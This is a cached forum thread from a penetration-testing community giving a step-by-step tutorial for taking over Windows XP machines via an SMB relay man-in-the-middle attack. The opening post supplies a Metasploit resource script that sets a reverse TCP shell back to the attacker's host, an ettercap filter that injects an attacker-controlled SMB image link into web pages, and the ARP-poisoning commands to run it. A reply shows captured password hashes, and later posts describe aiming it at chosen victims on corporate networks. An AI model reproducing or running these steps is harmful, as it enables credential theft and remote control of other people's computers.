This is Google's cache of http://forums.remote-exploit.org/tutorials-guides/12885-own-full-patched-xp-box-via-http.html. It is a snapshot of the page as it appeared on Feb 2, 2010 12:05:21 GMT. The current page could have changed in the meantime. Learn more

Full version
These search terms are highlighted: own full patched xp box via http remote exploit forums  
Own Full patched XP box via HTTP - Remote Exploit Forums

Go Back   Remote Exploit Forums > Archives > BackTrack v2.0 Final > Tutorials & Guides
User Name Remember Me?
Password


Tutorials & Guides Contributions welcome! Please check the rules & guidelines for posting

 
 
LinkBack Thread Tools
 
Old 03-22-2008, 02:58 AM
operat0r operat0r is offline
Senior Member
 
Join Date: Nov 2006
Posts: 313
Default Own Full patched XP box via HTTP

update 7:27 PM 2/4/2009: http://www.tarasco.org/security/smbrelay/index.html




videos:

# with ettercap
http://s5.video.blip.tv/170000300628...console219.flv

# Thursday, 20 September 2007 ( not with ettercap )
http://www.learnsecurityonline.com/v...ay-reverse.swf




4:42 PM 4/25/2008:
"" I tried it with "Use simple file sharing" (recommended) checked...and the exploit WOULD NOT WORK. ""

sadly (sometimes !?!?!?) this is checked by default so I will look into some other things ...
you also want to check out the fastrack mass client side has GDI and QT exploits all in one etc ! ( this is part of the fast-track.py you must update it to current )


Firefox be design will not load a 'local share' this including \\SMB\image.jpg shares
( if anybody has a non javascript workaround please let me know FLASH also has the same security or just gets passed to firefox and then borks )

May be possible to use this trick 301 redirect the user to a local\share
http://forums.remote-exploit.org/programming/16014-replace-exe-msf-payload.html#post94904



What you need:
* ettercap
* ms framework3
* victim must have admin privs with no blank password and load an HTTP or HTTPS webpage.
* only works for MIM ( LAN etc .. )

** based on HD moore's presentation at Defcon that used WPAD http://video.google.co.uk/videoplay?...56903673801959 'Tactical Exploitation'

change the IP to your IP


smb.rc
Code:
use exploit/windows/smb/smb_relay
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.1.90
set LPORT 21
exploit

smb.filter
Code:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("</body>", "<img src=\"\\\\192.168.1.90\\image.jpg\"> </body>" ");
   replace("</Body>", "<img src=\"\\\\192.168.1.90\\image.jpg\"> </body>" ");
   msg("Filter Ran.\n");
}
# etterfilter makes the smb.ef to use with ettercap

etterfilter smb.filter -o smb.ef
# run ettercap on target
ettercap -T -q -F smb.ef -M ARP // // -P autoadd

# start up msfconsole with the RC script
/pentest/exploits/framework3/msfconsole -r smb.rc


what happends ??

ettercap replaces IMG with \\yourip so then the victim trys to access your SMB_RELAY server for the IMG
then attacker say NO access denied ! victim says OK let me try my login by default


""Great job, but I got the well-known error message, which starts so:
"FAILED! The remote host has only provided us with Guest privileges...."""

read the error before that error the guest error just means the auth failed




Quote:
Originally Posted by www
5. On a Windows XP Pro computer, make sure that remote logons are not being coerced to the GUEST account (aka "ForceGuest", which is enabled by default computers that are not attached to a domain). To do this, open the Local Security Policy editor (e.g. by typing 'secpol.msc' into the Run box, without quotes). Expand the "Local Policies" node and select "Security Options". Now scroll down to the setting titled "Network access: Sharing and security model for local accounts". If this is set to "Guest only", change it to "Classic" and restart your computer.

Last edited by operat0r; 02-04-2009 at 07:11 PM.
 
Old 03-26-2008, 11:19 PM
unix_r00ter's Avatar
unix_r00ter unix_r00ter is offline
Member
 
Join Date: Feb 2007
Location: UK | Wales
Posts: 63
Default

does this only work on LAN??
 
Old 03-26-2008, 11:23 PM
Deathray's Avatar
Deathray Deathray is offline
Senior Member
 
Join Date: Oct 2007
Location: Vejle, Denmark
Posts: 380
Default

Very interesting ! I'm going to try it out right away.
I'll be back and tell how it went


Quote:
Originally Posted by unix_r00ter View Post
does this only work on LAN??
Read up on MITM (man in the middle) attacks.
 
Old 03-26-2008, 11:44 PM
Deathray's Avatar
Deathray Deathray is offline
Senior Member
 
Join Date: Oct 2007
Location: Vejle, Denmark
Posts: 380
Default

Target: Windows XP SP0 no updates at all.
Ettercap
Code:
Filter Ran.
Filter Ran.
Filter Ran.
Filter Ran.
Msfconsole
Code:
msf exploit(smb_relay) >

[*] Received 192.168.1.78:1057 \ LMHASH:00 NTHASH: OS:Windows 2002 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 192.168.1.78:1057 \
[*] Received 192.168.1.78:1057 VICTIMLOSER\Victimlooser 
LMHASH:93d1db444663b9c09378060fe4c2aead62db490241055c20 
NTHASH:c3156deb18c7a6e6d800c39c451abcfe39baaa133d72058a OS:Windows 2002 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.1.78 as VICTIMLOSER\Victimlooser...
[*] Failed to authenticate as VICTIMLOSER\Victimlooser...
And by the way, I think you should lookup the rules about links in signatures.
I'm not sure if plain-text links are allowed. Just trying to keep you out of trouble

Last edited by Deathray; 03-26-2008 at 11:58 PM.
 
Old 03-27-2008, 01:24 AM
williamc's Avatar
williamc williamc is offline
Senior Member
 
Join Date: May 2007
Posts: 277
Default

Couple of questions:
Must file sharing be enabled on the victim as mentioned in the presentation?

Is this for IE only? I'm seeing IE using <img src="\\ip\share\i.jpg> while Firefox is mozicon-url:file:////ip/share/i.jpg
 
Old 03-27-2008, 03:11 AM
operat0r operat0r is offline
Senior Member
 
Join Date: Nov 2006
Posts: 313
Default

humm ill try it with FF and add the code if it works thanks !
 
Old 03-27-2008, 01:47 PM
Dr_GrEeN's Avatar
Dr_GrEeN Dr_GrEeN is online now
Senior Member
 
Join Date: Sep 2007
Location: dark side of the moon
Posts: 682
Default

Nice little audit, I wrote a tut similar to this last October check it out.

http://forum.remote-exploit.org/show...?t=9121&page=2
__________________
yada yada
 
Old 03-27-2008, 06:17 PM
williamc's Avatar
williamc williamc is offline
Senior Member
 
Join Date: May 2007
Posts: 277
Default

Can you clarify how this will affect a corporate network? Will all clients be routed through my client by default or can you limit it to those that type in your IP address in the web browser?
 
Old 03-27-2008, 06:24 PM
operat0r operat0r is offline
Senior Member
 
Join Date: Nov 2006
Posts: 313
Default

Can you clarify how this will affect a corporate network?
total ownage if they have admin rights ( why ? because nobody has a blank password in a corp LAN )

Will all clients be routed through my client by default or can you limit it to those that type in your IP address in the web browser?
you need to read how MIM works and also read up on ettercap how it works etc
simply just make a target list insted of // // use the target IP /victomloser_CEO/ //
 
Old 03-27-2008, 06:27 PM
operat0r operat0r is offline
Senior Member
 
Join Date: Nov 2006
Posts: 313
Default

Quote:
Originally Posted by Dr_GrEeN View Post
Nice little audit, I wrote a tut similar to this last October check it out.

http://forum.remote-exploit.org/show...?t=9121&page=2
Ya now days I would use a more current sploit say RTSP etc ..
http://rmccurdy.com/scripts/videos/q...3%20msfweb.swf
 

Bookmarks
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



All times are GMT. The time now is 01:03 PM.

-- Original Default -- backtrack -- black-orange -- red-black -- Deutsch -- English (US) -- Italian -- Spanish

Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.3.2